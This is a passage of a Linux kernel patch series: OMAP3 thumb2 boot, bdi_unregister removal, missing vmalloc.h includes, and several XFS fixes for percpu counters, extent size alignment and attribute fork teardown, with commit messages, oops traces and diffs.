WREG32(VM_CONTEXT0_PROTECTION_FAULT_DEFAULT_ADDR, (u32)(rdev->dummy_page.addr >> 12)); From d8a50941c91a68da202aaa96a3dacd471ea9c693 Mon Sep 17 00:00:00 2001 From: Tony Lindgren Date: Thu, 28 May 2015 07:22:08 -0700 Subject: [PATCH 411/872] ARM: OMAP3: Fix booting with thumb2 kernel We get a NULL pointer dereference on omap3 for thumb2 compiled kernels: Internal error: Oops: 80000005 [#1] SMP THUMB2 ... [] (_raw_spin_unlock_irqrestore) from [] (omap3_enter_idle_bm+0xc5/0x178) [] (omap3_enter_idle_bm) from [] (cpuidle_enter_state+0x77/0x27c) [] (cpuidle_enter_state) from [] (cpu_startup_entry+0x155/0x23c) [] (cpu_startup_entry) from [] (start_kernel+0x32f/0x338) [] (start_kernel) from [<8000807f>] (0x8000807f) The power management related assembly on omaps needs to interact with ARM mode bootrom code, so we need to keep most of the related assembly in ARM mode. Turns out this error is because of missing ENDPROC for assembly code as suggested by Stephen Boyd . Let's fix the problem by adding ENDPROC in two places to sleep34xx.S. Let's also remove the now duplicate custom code for mode switching. This has been unnecessary since commit 6ebbf2ce437b ("ARM: convert all "mov.* pc, reg" to "bx reg" for ARMv6+"). And let's also remove the comments about local variables, they are now just confusing after the ENDPROC. The reason why ENDPROC makes a difference is it sets .type and then the compiler knows what to do with the thumb bit as explained at: https://wiki.ubuntu.com/ARM/Thumb2PortingHowto Reported-by: Kevin Hilman Tested-by: Kevin Hilman Signed-off-by: Tony Lindgren --- arch/arm/mach-omap2/sleep34xx.S | 22 ++-------------------- 1 file changed, 2 insertions(+), 20 deletions(-) diff --git a/arch/arm/mach-omap2/sleep34xx.S b/arch/arm/mach-omap2/sleep34xx.S index d1dedc8195ed..eafd120b53f1 100644 --- a/arch/arm/mach-omap2/sleep34xx.S +++ b/arch/arm/mach-omap2/sleep34xx.S @@ -203,23 +203,8 @@ save_context_wfi: */ ldr r1, kernel_flush blx r1 - /* - * The kernel doesn't interwork: v7_flush_dcache_all in particluar will - * always return in Thumb state when CONFIG_THUMB2_KERNEL is enabled. - * This sequence switches back to ARM. Note that .align may insert a - * nop: bx pc needs to be word-aligned in order to work. - */ - THUMB( .thumb ) - THUMB( .align ) - THUMB( bx pc ) - THUMB( nop ) - .arm - b omap3_do_wfi - -/* - * Local variables - */ +ENDPROC(omap34xx_cpu_suspend) omap3_do_wfi_sram_addr: .word omap3_do_wfi_sram kernel_flush: @@ -364,10 +349,7 @@ exit_nonoff_modes: * =================================== */ ldmfd sp!, {r4 - r11, pc} @ restore regs and return - -/* - * Local variables - */ +ENDPROC(omap3_do_wfi) sdrc_power: .word SDRC_POWER_V cm_idlest1_core: From aad653a0bc09dd4ebcb5579f9f835bbae9ef2ba3 Mon Sep 17 00:00:00 2001 From: NeilBrown Date: Tue, 19 May 2015 15:58:37 +1000 Subject: [PATCH 412/872] block: discard bdi_unregister() in favour of bdi_destroy() bdi_unregister() now contains very little functionality. It contains a "WARN_ON" if bdi->dev is NULL. This warning is of no real consequence as bdi->dev isn't needed by anything else in the function, and it triggers if blk_cleanup_queue() -> bdi_destroy() is called before bdi_unregister, which happens since Commit: 6cd18e711dd8 ("block: destroy bdi before blockdev is unregistered.") So this isn't wanted. It also calls bdi_set_min_ratio(). This needs to be called after writes through the bdi have all been flushed, and before the bdi is destroyed. Calling it early is better than calling it late as it frees up a global resource. Calling it immediately after bdi_wb_shutdown() in bdi_destroy() perfectly fits these requirements. So bdi_unregister() can be discarded with the important content moved to bdi_destroy(), as can the writeback_bdi_unregister event which is already not used. Reported-by: Mike Snitzer Cc: stable@vger.kernel.org (v4.0) Fixes: c4db59d31e39 ("fs: don't reassign dirty inodes to default_backing_dev_info") Fixes: 6cd18e711dd8 ("block: destroy bdi before blockdev is unregistered.") Acked-by: Peter Zijlstra (Intel) Acked-by: Dan Williams Tested-by: Nicholas Moulin Signed-off-by: NeilBrown Reviewed-by: Christoph Hellwig Signed-off-by: Jens Axboe --- block/genhd.c | 1 - include/linux/backing-dev.h | 1 - include/trace/events/writeback.h | 1 - mm/backing-dev.c | 18 +----------------- 4 files changed, 1 insertion(+), 20 deletions(-) diff --git a/block/genhd.c b/block/genhd.c index 0a536dc05f3b..666e11b83983 100644 --- a/block/genhd.c +++ b/block/genhd.c @@ -653,7 +653,6 @@ void del_gendisk(struct gendisk *disk) disk->flags &= ~GENHD_FL_UP; sysfs_remove_link(&disk_to_dev(disk)->kobj, "bdi"); - bdi_unregister(&disk->queue->backing_dev_info); blk_unregister_queue(disk); blk_unregister_region(disk_devt(disk), disk->minors); diff --git a/include/linux/backing-dev.h b/include/linux/backing-dev.h index aff923ae8c4b..d87d8eced064 100644 --- a/include/linux/backing-dev.h +++ b/include/linux/backing-dev.h @@ -116,7 +116,6 @@ __printf(3, 4) int bdi_register(struct backing_dev_info *bdi, struct device *parent, const char *fmt, ...); int bdi_register_dev(struct backing_dev_info *bdi, dev_t dev); -void bdi_unregister(struct backing_dev_info *bdi); int __must_check bdi_setup_and_register(struct backing_dev_info *, char *); void bdi_start_writeback(struct backing_dev_info *bdi, long nr_pages, enum wb_reason reason); diff --git a/include/trace/events/writeback.h b/include/trace/events/writeback.h index 880dd7437172..c178d13d6f4c 100644 --- a/include/trace/events/writeback.h +++ b/include/trace/events/writeback.h @@ -250,7 +250,6 @@ DEFINE_EVENT(writeback_class, name, \ DEFINE_WRITEBACK_EVENT(writeback_nowork); DEFINE_WRITEBACK_EVENT(writeback_wake_background); DEFINE_WRITEBACK_EVENT(writeback_bdi_register); -DEFINE_WRITEBACK_EVENT(writeback_bdi_unregister); DECLARE_EVENT_CLASS(wbc_class, TP_PROTO(struct writeback_control *wbc, struct backing_dev_info *bdi), diff --git a/mm/backing-dev.c b/mm/backing-dev.c index 6dc4580df2af..000e7b3b9896 100644 --- a/mm/backing-dev.c +++ b/mm/backing-dev.c @@ -359,23 +359,6 @@ static void bdi_wb_shutdown(struct backing_dev_info *bdi) flush_delayed_work(&bdi->wb.dwork); } -/* - * Called when the device behind @bdi has been removed or ejected. - * - * We can't really do much here except for reducing the dirty ratio at - * the moment. In the future we should be able to set a flag so that - * the filesystem can handle errors at mark_inode_dirty time instead - * of only at writeback time. - */ -void bdi_unregister(struct backing_dev_info *bdi) -{ - if (WARN_ON_ONCE(!bdi->dev)) - return; - - bdi_set_min_ratio(bdi, 0); -} -EXPORT_SYMBOL(bdi_unregister); - static void bdi_wb_init(struct bdi_writeback *wb, struct backing_dev_info *bdi) { memset(wb, 0, sizeof(*wb)); @@ -443,6 +426,7 @@ void bdi_destroy(struct backing_dev_info *bdi) int i; bdi_wb_shutdown(bdi); + bdi_set_min_ratio(bdi, 0); WARN_ON(!list_empty(&bdi->work_list)); WARN_ON(delayed_work_pending(&bdi->wb.dwork)); From 5538d294dd6661de27b567fe69b597c99cb54cdd Mon Sep 17 00:00:00 2001 From: "David S. Miller" Date: Thu, 28 May 2015 11:35:41 -0700 Subject: [PATCH 413/872] treewide: Add missing vmalloc.h inclusion. All of these files were only building on non-x86 because of the indirect of inclusion of vmalloc.h by, of all things, "net/inet_hashtables.h" None of this got caught during build testing, because on x86 there is an implicit vmalloc.h include via on of the arch asm/ headers. This fixes all of these Reported-by: Stephen Rothwell Signed-off-by: David S. Miller --- drivers/scsi/qla2xxx/tcm_qla2xxx.c | 1 + drivers/target/iscsi/iscsi_target.c | 1 + drivers/target/target_core_file.c | 1 + drivers/target/target_core_pr.c | 1 + drivers/target/target_core_transport.c | 1 + drivers/target/target_core_user.c | 1 + drivers/vhost/scsi.c | 1 + 7 files changed, 7 insertions(+) diff --git a/drivers/scsi/qla2xxx/tcm_qla2xxx.c b/drivers/scsi/qla2xxx/tcm_qla2xxx.c index 68c2002e78bf..b59dee56800c 100644 --- a/drivers/scsi/qla2xxx/tcm_qla2xxx.c +++ b/drivers/scsi/qla2xxx/tcm_qla2xxx.c @@ -27,6 +27,7 @@ #include #include #include +#include #include #include #include diff --git a/drivers/target/iscsi/iscsi_target.c b/drivers/target/iscsi/iscsi_target.c index 34871a628b11..112cfcda3c3c 100644 --- a/drivers/target/iscsi/iscsi_target.c +++ b/drivers/target/iscsi/iscsi_target.c @@ -21,6 +21,7 @@ #include #include #include +#include #include #include #include diff --git a/drivers/target/target_core_file.c b/drivers/target/target_core_file.c index f7e6e51aed36..0853a060f1a4 100644 --- a/drivers/target/target_core_file.c +++ b/drivers/target/target_core_file.c @@ -30,6 +30,7 @@ #include #include #include +#include #include #include #include diff --git a/drivers/target/target_core_pr.c b/drivers/target/target_core_pr.c index c1aa9655e96e..580040d5c52b 100644 --- a/drivers/target/target_core_pr.c +++ b/drivers/target/target_core_pr.c @@ -27,6 +27,7 @@ #include #include #include +#include #include #include #include diff --git a/drivers/target/target_core_transport.c b/drivers/target/target_core_transport.c index 3fe5cb240b6f..ad40036a64a6 100644 --- a/drivers/target/target_core_transport.c +++ b/drivers/target/target_core_transport.c @@ -34,6 +34,7 @@ #include #include #include +#include #include #include #include diff --git a/drivers/target/target_core_user.c b/drivers/target/target_core_user.c index dbc872a6c981..78a1d1940347 100644 --- a/drivers/target/target_core_user.c +++ b/drivers/target/target_core_user.c @@ -21,6 +21,7 @@ #include #include #include +#include #include #include #include diff --git a/drivers/vhost/scsi.c b/drivers/vhost/scsi.c index 5e19bb53b3a9..864a82ef2312 100644 --- a/drivers/vhost/scsi.c +++ b/drivers/vhost/scsi.c @@ -35,6 +35,7 @@ #include #include #include +#include #include #include #include From 74f9ce1cf2830b94e189f4e99678dbf19aa3bc90 Mon Sep 17 00:00:00 2001 From: George Wang Date: Fri, 29 May 2015 07:39:34 +1000 Subject: [PATCH 414/872] xfs: use percpu_counter_read_positive for mp->m_icount Function percpu_counter_read just return the current counter, which can be negative. This will cause the checking of "allocated inode counts <= m_maxicount" false positive. Use percpu_counter_read_positive can solve this problem, and be consistent with the purpose to introduce percpu mechanism to xfs. Signed-off-by: George Wang Reviewed-by: Dave Chinner Signed-off-by: Dave Chinner --- fs/xfs/libxfs/xfs_ialloc.c | 9 ++++++--- 1 file changed, 6 insertions(+), 3 deletions(-) diff --git a/fs/xfs/libxfs/xfs_ialloc.c b/fs/xfs/libxfs/xfs_ialloc.c index 07349a183a11..1c9e75521250 100644 --- a/fs/xfs/libxfs/xfs_ialloc.c +++ b/fs/xfs/libxfs/xfs_ialloc.c @@ -376,7 +376,7 @@ xfs_ialloc_ag_alloc( */ newlen = args.mp->m_ialloc_inos; if (args.mp->m_maxicount && - percpu_counter_read(&args.mp->m_icount) + newlen > + percpu_counter_read_positive(&args.mp->m_icount) + newlen > args.mp->m_maxicount) return -ENOSPC; args.minlen = args.maxlen = args.mp->m_ialloc_blks; @@ -1339,10 +1339,13 @@ xfs_dialloc( * If we have already hit the ceiling of inode blocks then clear * okalloc so we scan all available agi structures for a free * inode. + * + * Read rough value of mp->m_icount by percpu_counter_read_positive, + * which will sacrifice the preciseness but improve the performance. */ if (mp->m_maxicount && - percpu_counter_read(&mp->m_icount) + mp->m_ialloc_inos > - mp->m_maxicount) { + percpu_counter_read_positive(&mp->m_icount) + mp->m_ialloc_inos + > mp->m_maxicount) { noroom = 1; okalloc = 0; } From 80188b0d77d7426b494af739ac129e0e684acb84 Mon Sep 17 00:00:00 2001 From: Dave Chinner Date: Fri, 29 May 2015 07:39:34 +1000 Subject: [PATCH 415/872] percpu_counter: batch size aware __percpu_counter_compare() XFS uses non-stanard batch sizes for avoiding frequent global counter updates on it's allocated inode counters, as they increment or decrement in batches of 64 inodes. Hence the standard percpu counter batch of 32 means that the counter is effectively a global counter. Currently Xfs uses a batch size of 128 so that it doesn't take the global lock on every single modification. However, Xfs also needs to compare accurately against zero, which means we need to use percpu_counter_compare(), and that has a hard-coded batch size of 32, and hence will spuriously fail to detect when it is supposed to use precise comparisons and hence the accounting goes wrong. Add __percpu_counter_compare() to take a custom batch size so we can use it sanely in XFS and factor percpu_counter_compare() to use it. Signed-off-by: Dave Chinner Acked-by: Tejun Heo Signed-off-by: Dave Chinner --- include/linux/percpu_counter.h | 13 ++++++++++++- lib/percpu_counter.c | 6 +++--- 2 files changed, 15 insertions(+), 4 deletions(-) diff --git a/include/linux/percpu_counter.h b/include/linux/percpu_counter.h index 50e50095c8d1..84a109449610 100644 --- a/include/linux/percpu_counter.h +++ b/include/linux/percpu_counter.h @@ -41,7 +41,12 @@ void percpu_counter_destroy(struct percpu_counter *fbc); void percpu_counter_set(struct percpu_counter *fbc, s64 amount); void __percpu_counter_add(struct percpu_counter *fbc, s64 amount, s32 batch); s64 __percpu_counter_sum(struct percpu_counter *fbc); -int percpu_counter_compare(struct percpu_counter *fbc, s64 rhs); +int __percpu_counter_compare(struct percpu_counter *fbc, s64 rhs, s32 batch); + +static inline int percpu_counter_compare(struct percpu_counter *fbc, s64 rhs) +{ + return __percpu_counter_compare(fbc, rhs, percpu_counter_batch); +} static inline void percpu_counter_add(struct percpu_counter *fbc, s64 amount) { @@ -116,6 +121,12 @@ static inline int percpu_counter_compare(struct percpu_counter *fbc, s64 rhs) return 0; } +static inline int +__percpu_counter_compare(struct percpu_counter *fbc, s64 rhs, s32 batch) +{ + return percpu_counter_compare(fbc, rhs); +} + static inline void percpu_counter_add(struct percpu_counter *fbc, s64 amount) { diff --git a/lib/percpu_counter.c b/lib/percpu_counter.c index 48144cdae819..f051d69f0910 100644 --- a/lib/percpu_counter.c +++ b/lib/percpu_counter.c @@ -197,13 +197,13 @@ static int percpu_counter_hotcpu_callback(struct notifier_block *nb, * Compare counter against given value. * Return 1 if greater, 0 if equal and -1 if less */ -int percpu_counter_compare(struct percpu_counter *fbc, s64 rhs) +int __percpu_counter_compare(struct percpu_counter *fbc, s64 rhs, s32 batch) { s64 count; count = percpu_counter_read(fbc); /* Check to see if rough count will be sufficient for comparison */ - if (abs(count - rhs) > (percpu_counter_batch*num_online_cpus())) { + if (abs(count - rhs) > (batch * num_online_cpus())) { if (count > rhs) return 1; else @@ -218,7 +218,7 @@ int percpu_counter_compare(struct percpu_counter *fbc, s64 rhs) else return 0; } -EXPORT_SYMBOL(percpu_counter_compare); +EXPORT_SYMBOL(__percpu_counter_compare); static int __init percpu_counter_startup(void) { From 8c1903d3081ab7c416f1bbc7905f37a265d5e2e9 Mon Sep 17 00:00:00 2001 From: Dave Chinner Date: Fri, 29 May 2015 07:39:34 +1000 Subject: [PATCH 416/872] xfs: inode and free block counters need to use __percpu_counter_compare Because the counters use a custom batch size, the comparison functions need to be aware of that batch size otherwise the comparison does not work correctly. This leads to ASSERT failures on generic/027 like this: XFS: Assertion failed: 0, file: fs/xfs/xfs_mount.c, line: 1099 ------------[ cut here ]------------ .... Call Trace: [] xfs_mod_icount+0x99/0xc0 [] xfs_trans_unreserve_and_mod_sb+0x28b/0x5b0 [] xfs_log_commit_cil+0x321/0x580 [] xfs_trans_commit+0xb7/0x260 [] xfs_bmap_finish+0xcd/0x1b0 [] xfs_inactive_ifree+0x1e1/0x250 [] xfs_inactive+0x130/0x200 [] xfs_fs_evict_inode+0x91/0xf0 [] evict+0xb8/0x190 [] iput+0x18b/0x1f0 [] do_unlinkat+0x1f3/0x320 [] ? filp_close+0x5a/0x80 [] SyS_unlinkat+0x1b/0x40 [] system_call_fastpath+0x12/0x71 This is a regression introduced by commit 501ab32 ("xfs: use generic percpu counters for inode counter"). This patch fixes the same problem for both the inode counter and the free block counter in the superblocks. Signed-off-by: Dave Chinner Reviewed-by: Brian Foster Signed-off-by: Dave Chinner --- fs/xfs/xfs_mount.c | 34 ++++++++++++++++++++-------------- 1 file changed, 20 insertions(+), 14 deletions(-) diff --git a/fs/xfs/xfs_mount.c b/fs/xfs/xfs_mount.c index 2ce7ee3b4ec1..6f23fbdfb365 100644 --- a/fs/xfs/xfs_mount.c +++ b/fs/xfs/xfs_mount.c @@ -1084,14 +1084,18 @@ xfs_log_sbcount(xfs_mount_t *mp) return xfs_sync_sb(mp, true); } +/* + * Deltas for the inode count are +/-64, hence we use a large batch size + * of 128 so we don't need to take the counter lock on every update. + */ +#define XFS_ICOUNT_BATCH 128 int xfs_mod_icount( struct xfs_mount *mp, int64_t delta) { - /* deltas are +/-64, hence the large batch size of 128. */ - __percpu_counter_add(&mp->m_icount, delta, 128); - if (percpu_counter_compare(&mp->m_icount, 0) < 0) { + __percpu_counter_add(&mp->m_icount, delta, XFS_ICOUNT_BATCH); + if (__percpu_counter_compare(&mp->m_icount, 0, XFS_ICOUNT_BATCH) < 0) { ASSERT(0); percpu_counter_add(&mp->m_icount, -delta); return -EINVAL; @@ -1113,6 +1117,14 @@ xfs_mod_ifree( return 0; } +/* + * Deltas for the block count can vary from 1 to very large, but lock contention + * only occurs on frequent small block count updates such as in the delayed + * allocation path for buffered writes (page a time updates). Hence we set + * a large batch count (1024) to minimise global counter updates except when + * we get near to ENOSPC and we have to be very accurate with our updates. + */ +#define XFS_FDBLOCKS_BATCH 1024 int xfs_mod_fdblocks( struct xfs_mount *mp, @@ -1151,25 +1163,19 @@ xfs_mod_fdblocks( * Taking blocks away, need to be more accurate the closer we * are to zero. * - * batch size is set to a maximum of 1024 blocks - if we are - * allocating of freeing extents larger than this then we aren't - * going to be hammering the counter lock so a lock per update - * is not a problem. - * * If the counter has a value of less than 2 * max batch size, * then make everything serialise as we are real close to * ENOSPC. */ -#define __BATCH 1024 - if (percpu_counter_compare(&mp->m_fdblocks, 2 * __BATCH) < 0) + if (__percpu_counter_compare(&mp->m_fdblocks, 2 * XFS_FDBLOCKS_BATCH, + XFS_FDBLOCKS_BATCH) < 0) batch = 1; else - batch = __BATCH; -#undef __BATCH + batch = XFS_FDBLOCKS_BATCH; __percpu_counter_add(&mp->m_fdblocks, delta, batch); - if (percpu_counter_compare(&mp->m_fdblocks, - XFS_ALLOC_SET_ASIDE(mp)) >= 0) { + if (__percpu_counter_compare(&mp->m_fdblocks, XFS_ALLOC_SET_ASIDE(mp), + XFS_FDBLOCKS_BATCH) >= 0) { /* we had space! */ return 0; } From 6dea405eee9e5e73eb54a1dbcc5b65047113cd92 Mon Sep 17 00:00:00 2001 From: Dave Chinner Date: Fri, 29 May 2015 07:40:06 +1000 Subject: [PATCH 417/872] xfs: extent size hints can round up extents past MAXEXTLEN This results in BMBT corruption, as seen by this test: # mkfs.xfs -f -d size=40051712b,agcount=4 /dev/vdc .... # mount /dev/vdc /mnt/scratch # xfs_io -ft -c "extsize 16m" -c "falloc 0 30g" -c "bmap -vp" /mnt/scratch/foo which results in this failure on a debug kernel: XFS: Assertion failed: (blockcount & xfs_mask64hi(64-BMBT_BLOCKCOUNT_BITLEN)) == 0, file: fs/xfs/libxfs/xfs_bmap_btree.c, line: 211 .... Call Trace: [] xfs_bmbt_set_allf+0x8f/0x100 [] xfs_bmbt_set_all+0x1d/0x20 [] xfs_iext_insert+0x9e/0x120 [] ? xfs_bmap_add_extent_hole_real+0x1c6/0xc70 [] xfs_bmap_add_extent_hole_real+0x1c6/0xc70 [] xfs_bmapi_write+0x72b/0xed0 [] ? kmem_cache_alloc+0x15c/0x170 [] xfs_alloc_file_space+0x160/0x400 [] ? down_write+0x29/0x60 [] xfs_file_fallocate+0x29b/0x310 [] ? __sb_start_write+0x58/0x120 [] ? do_vfs_ioctl+0x318/0x570 [] vfs_fallocate+0x140/0x260 [] SyS_fallocate+0x48/0x80 [] system_call_fastpath+0x12/0x17 The tracepoint that indicates the extent that triggered the assert failure is: xfs_iext_insert: idx 0 offset 0 block 16777224 count 2097152 flag 1 Clearly indicating that the extent length is greater than MAXEXTLEN, which is 2097151. A prior trace point shows the allocation was an exact size match and that a length greater than MAXEXTLEN was asked for: xfs_alloc_size_done: agno 1 agbno 8 minlen 2097152 maxlen 2097152 ^^^^^^^ ^^^^^^^ We don't see this problem with extent size hints through the IO path because we can't do single IOs large enough to trigger MAXEXTLEN allocation. fallocate(), OTOH, is not limited in it's allocation sizes and so needs help here. The issue is that the extent size hint alignment is rounding up the extent size past MAXEXTLEN, because xfs_bmapi_write() is not taking into account extent size hints when calculating the maximum extent length to allocate. xfs_bmapi_reserve_delalloc() is already doing this, but direct extent allocation is not. Unfortunately, the calculation in xfs_bmapi_reserve_delalloc() is wrong, and it works only because delayed allocation extents are not limited in size to MAXEXTLEN in the in-core extent tree. hence this calculation does not work for direct allocation, and the delalloc code needs fixing. This may, in fact be the underlying bug that occassionally causes transaction overruns in delayed allocation extent conversion, so now we know it's wrong we should fix it, too. Many thanks to Brian Foster for finding this problem during review of this patch. Hence the fix, after much code reading, is to allow xfs_bmap_extsize_align() to align partial extents when full alignment would extend the alignment past MAXEXTLEN. We can safely do this because all callers have higher layer allocation loops that already handle short allocations, and so will simply run another allocation to cover the remainder of the requested allocation range that we ignored during alignment. The advantage of this approach is that it also removes the need for callers to do anything other than limit their requests to MAXEXTLEN - they don't really need to be aware of extent size hints at all. Signed-off-by: Dave Chinner Reviewed-by: Brian Foster Signed-off-by: Dave Chinner --- fs/xfs/libxfs/xfs_bmap.c | 31 +++++++++++++++++++------------ 1 file changed, 19 insertions(+), 12 deletions(-) diff --git a/fs/xfs/libxfs/xfs_bmap.c b/fs/xfs/libxfs/xfs_bmap.c index aeffeaaac0ec..f1026e86dabc 100644 --- a/fs/xfs/libxfs/xfs_bmap.c +++ b/fs/xfs/libxfs/xfs_bmap.c @@ -3224,12 +3224,24 @@ xfs_bmap_extsize_align( align_alen += temp; align_off -= temp; } + + /* Same adjustment for the end of the requested area. */ + temp = (align_alen % extsz); + if (temp) + align_alen += extsz - temp; + /* - * Same adjustment for the end of the requested area. + * For large extent hint sizes, the aligned extent might be larger than + * MAXEXTLEN. In that case, reduce the size by an extsz so that it pulls + * the length back under MAXEXTLEN. The outer allocation loops handle + * short allocation just fine, so it is safe to do this. We only want to + * do it when we are forced to, though, because it means more allocation + * operations are required. */ - if ((temp = (align_alen % extsz))) { - align_alen += extsz - temp; - } + while (align_alen > MAXEXTLEN) + align_alen -= extsz; + ASSERT(align_alen <= MAXEXTLEN); + /* * If the previous block overlaps with this proposed allocation * then move the start forward without adjusting the length. @@ -3318,7 +3330,9 @@ xfs_bmap_extsize_align( return -EINVAL; } else { ASSERT(orig_off >= align_off); - ASSERT(orig_end <= align_off + align_alen); + /* see MAXEXTLEN handling above */ + ASSERT(orig_end <= align_off + align_alen || + align_alen + extsz > MAXEXTLEN); } #ifdef DEBUG @@ -4099,13 +4113,6 @@ xfs_bmapi_reserve_delalloc( /* Figure out the extent size, adjust alen */ extsz = xfs_get_extsz_hint(ip); if (extsz) { - /* - * Make sure we don't exceed a single extent length when we - * align the extent by reducing length we are going to - * allocate by the maximum amount extent size aligment may - * require. - */ - alen = XFS_FILBLKS_MIN(len, MAXEXTLEN - (2 * extsz - 1)); error = xfs_bmap_extsize_align(mp, got, prev, extsz, rt, eof, 1, 0, &aoff, &alen); ASSERT(!error); From 6dfe5a049f2d48582050339d2a6b6fda36dfd14c Mon Sep 17 00:00:00 2001 From: Dave Chinner Date: Fri, 29 May 2015 07:40:08 +1000 Subject: [PATCH 418/872] xfs: xfs_attr_inactive leaves inconsistent attr fork state behind xfs_attr_inactive() is supposed to clean up the attribute fork when the inode is being freed. While it removes attribute fork extents, it completely ignores attributes in local format, which means that there can still be active attributes on the inode after xfs_attr_inactive() has run. This leads to problems with concurrent inode writeback - the in-core inode attribute fork is removed without locking on the assumption that nothing will be attempting to access the attribute fork after a call to xfs_attr_inactive() because it isn't supposed to exist on disk any more. To fix this, make xfs_attr_inactive() completely remove all traces of the attribute fork from the inode, regardless of it's state. Further, also remove the in-core attribute fork structure safely so that there is nothing further that needs to be done by callers to clean up the attribute fork. This means we can remove the in-core and on-disk attribute forks atomically. Also, on error simply remove the in-memory attribute fork. There's nothing that can be done with it once we have failed to remove the on-disk attribute fork, so we may as well just blow it away here anyway. cc: # 3.12 to 4.0 Reported-by: Waiman Long Signed-off-by: Dave Chinner Reviewed-by: Brian Foster Signed-off-by: Dave Chinner --- fs/xfs/libxfs/xfs_attr_leaf.c | 8 ++-- fs/xfs/libxfs/xfs_attr_leaf.h | 2 +- fs/xfs/xfs_attr_inactive.c | 83 +++++++++++++++++++++-------------- fs/xfs/xfs_inode.c | 12 ++--- 4 files changed, 58 insertions(+), 47 deletions(-) diff --git a/fs/xfs/libxfs/xfs_attr_leaf.c b/fs/xfs/libxfs/xfs_attr_leaf.c index 04e79d57bca6..e9d401ce93bb 100644 --- a/fs/xfs/libxfs/xfs_attr_leaf.c +++ b/fs/xfs/libxfs/xfs_attr_leaf.c @@ -574,8 +574,8 @@ xfs_attr_shortform_add(xfs_da_args_t *args, int forkoff) * After the last attribute is removed revert to original inode format, * making all literal area available to the data fork once more. */ -STATIC void -xfs_attr_fork_reset( +void +xfs_attr_fork_remove( struct xfs_inode *ip, struct xfs_trans *tp) { @@ -641,7 +641,7 @@ xfs_attr_shortform_remove(xfs_da_args_t *args) (mp->m_flags & XFS_MOUNT_ATTR2) && (dp->i_d.di_format != XFS_DINODE_FMT_BTREE) && !(args->op_flags & XFS_DA_OP_ADDNAME)) { - xfs_attr_fork_reset(dp, args->trans); + xfs_attr_fork_remove(dp, args->trans); } else { xfs_idata_realloc(dp, -size, XFS_ATTR_FORK); dp->i_d.di_forkoff = xfs_attr_shortform_bytesfit(dp, totsize); @@ -905,7 +905,7 @@ xfs_attr3_leaf_to_shortform( if (forkoff == -1) { ASSERT(dp->i_mount->m_flags & XFS_MOUNT_ATTR2); ASSERT(dp->i_d.di_format != XFS_DINODE_FMT_BTREE); - xfs_attr_fork_reset(dp, args->trans); + xfs_attr_fork_remove(dp, args->trans); goto out; } diff --git a/fs/xfs/libxfs/xfs_attr_leaf.h b/fs/xfs/libxfs/xfs_attr_leaf.h index 025c4b820c03..882c8d338891 100644 --- a/fs/xfs/libxfs/xfs_attr_leaf.h +++ b/fs/xfs/libxfs/xfs_attr_leaf.h @@ -53,7 +53,7 @@ int xfs_attr_shortform_remove(struct xfs_da_args *args); int xfs_attr_shortform_list(struct xfs_attr_list_context *context); int xfs_attr_shortform_allfit(struct xfs_buf *bp, struct xfs_inode *dp); int xfs_attr_shortform_bytesfit(xfs_inode_t *dp, int bytes); - +void xfs_attr_fork_remove(struct xfs_inode *ip, struct xfs_trans *tp); /* * Internal routines when attribute fork size == XFS_LBSIZE(mp). diff --git a/fs/xfs/xfs_attr_inactive.c b/fs/xfs/xfs_attr_inactive.c index f9c1c64782d3..3fbf167cfb4c 100644 --- a/fs/xfs/xfs_attr_inactive.c +++ b/fs/xfs/xfs_attr_inactive.c @@ -380,23 +380,31 @@ xfs_attr3_root_inactive( return error; } +/* + * xfs_attr_inactive kills all traces of an attribute fork on an inode. It + * removes both the on-disk and in-memory inode fork. Note that this also has to + * handle the condition of inodes without attributes but with an attribute fork + * configured, so we can't use xfs_inode_hasattr() here. + * + * The in-memory attribute fork is removed even on error. + */ int -xfs_attr_inactive(xfs_inode_t *dp) +xfs_attr_inactive( + struct xfs_inode *dp) { - xfs_trans_t *trans; - xfs_mount_t *mp; - int error; + struct xfs_trans *trans; + struct xfs_mount *mp; + int cancel_flags = 0; + int lock_mode = XFS_ILOCK_SHARED; + int error = 0; mp = dp->i_mount; ASSERT(! XFS_NOT_DQATTACHED(mp, dp)); - xfs_ilock(dp, XFS_ILOCK_SHARED); - if (!xfs_inode_hasattr(dp) || - dp->i_d.di_aformat == XFS_DINODE_FMT_LOCAL) { - xfs_iunlock(dp, XFS_ILOCK_SHARED); - return 0; - } - xfs_iunlock(dp, XFS_ILOCK_SHARED); + xfs_ilock(dp, lock_mode); + if (!XFS_IFORK_Q(dp)) + goto out_destroy_fork; + xfs_iunlock(dp, lock_mode); /* * Start our first transaction of the day. @@ -408,13 +416,18 @@ xfs_attr_inactive(xfs_inode_t *dp) * the inode in every transaction to let it float upward through * the log. */ + lock_mode = 0; trans = xfs_trans_alloc(mp, XFS_TRANS_ATTRINVAL); error = xfs_trans_reserve(trans, &M_RES(mp)->tr_attrinval, 0, 0); - if (error) { - xfs_trans_cancel(trans, 0); - return error; - } - xfs_ilock(dp, XFS_ILOCK_EXCL); + if (error) + goto out_cancel; + + lock_mode = XFS_ILOCK_EXCL; + cancel_flags = XFS_TRANS_RELEASE_LOG_RES | XFS_TRANS_ABORT; + xfs_ilock(dp, lock_mode); + + if (!XFS_IFORK_Q(dp)) + goto out_cancel; /* * No need to make quota reservations here. We expect to release some @@ -422,29 +435,31 @@ xfs_attr_inactive(xfs_inode_t *dp) */ xfs_trans_ijoin(trans, dp, 0); - /* - * Decide on what work routines to call based on the inode size. - */ - if (!xfs_inode_hasattr(dp) || - dp->i_d.di_aformat == XFS_DINODE_FMT_LOCAL) { - error = 0; - goto out; + /* invalidate and truncate the attribute fork extents */ + if (dp->i_d.di_aformat != XFS_DINODE_FMT_LOCAL) { + error = xfs_attr3_root_inactive(&trans, dp); + if (error) + goto out_cancel; + + error = xfs_itruncate_extents(&trans, dp, XFS_ATTR_FORK, 0); + if (error) + goto out_cancel; } - error = xfs_attr3_root_inactive(&trans, dp); - if (error) - goto out; - error = xfs_itruncate_extents(&trans, dp, XFS_ATTR_FORK, 0); - if (error) - goto out; + /* Reset the attribute fork - this also destroys the in-core fork */ + xfs_attr_fork_remove(dp, trans); error = xfs_trans_commit(trans, XFS_TRANS_RELEASE_LOG_RES); - xfs_iunlock(dp, XFS_ILOCK_EXCL); - + xfs_iunlock(dp, lock_mode); return error; -out: - xfs_trans_cancel(trans, XFS_TRANS_RELEASE_LOG_RES|XFS_TRANS_ABORT); - xfs_iunlock(dp, XFS_ILOCK_EXCL); +out_cancel: + xfs_trans_cancel(trans, cancel_flags); +out_destroy_fork: + /* kill the in-core attr fork before we drop the inode lock */ + if (dp->i_afp) + xfs_idestroy_fork(dp, 